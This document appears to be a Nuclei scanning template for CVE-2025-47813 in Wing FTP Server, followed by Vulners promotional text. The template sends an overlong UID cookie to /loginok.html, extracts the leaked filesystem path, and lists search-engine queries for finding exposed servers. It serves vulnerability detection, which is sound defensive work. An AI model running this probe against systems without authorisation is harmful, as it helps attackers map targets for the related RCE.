| Source | Link |
|---|---|
| rcesecurity | www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/ |
| wftpserver | www.wftpserver.com/ |
id: CVE-2025-47813
info:
name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
author: rcesecurity,pdteam
severity: medium
description: |
Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
impact: |
Authenticated attackers can supply an overlong UID cookie value to trigger error responses that disclose the full local filesystem path, aiding in further exploitation attempts.
remediation: |
Upgrade Wing FTP Server to version 7.4.4 or later that properly validates UID cookie values.
reference:
- https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
- https://www.wftpserver.com
classification:
epss-score: 0.56366
epss-percentile: 0.98936
cve-id: CVE-2025-47813
cwe-id: CWE-209
cvss-score: 5.3
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
metadata:
product: wftpserver
vendor: wing_ftp_server
verified: false
shodan-query:
- http.html_hash:2121146066
- http.favicon.hash:963565804
- title:"Wing FTP Server"
- "Server: Wing FTP Server"
fofa-query:
- icon_hash="963565804"
- title="Wing FTP Server"
zoomeye-query:
- app="Wing FTP Server"
tags: cve,cve2025,wingftp,unauth,exposure,vuln,kev,vkev
variables:
longuid: "{{repeat('A', 2048)}}"
http:
- method: POST
path:
- "{{BaseURL}}/loginok.html"
headers:
Cookie: "UID={{longuid}}"
Content-Type: application/x-www-form-urlencoded
body: "username=anonymous&password=test"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Server Path"
- "Error"
- ":\\\\" # Windows path
- "/usr/" # Linux path
condition: or
- type: word
part: header
words:
- "Wing FTP Server"
extractors:
- type: regex
part: body
regex:
- '([a-zA-Z]:[\\/][^A\r\n]{10,})'
# digest: 4a0a0047304502206ea4b1448563ad3fb4e2ec1b8288d2ee057982b591d1d6899470d29da7a019f20221009e232a6ae3eeecb9f6822ce905dc1422ae74dd57091873b6d8150d0167a39681:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation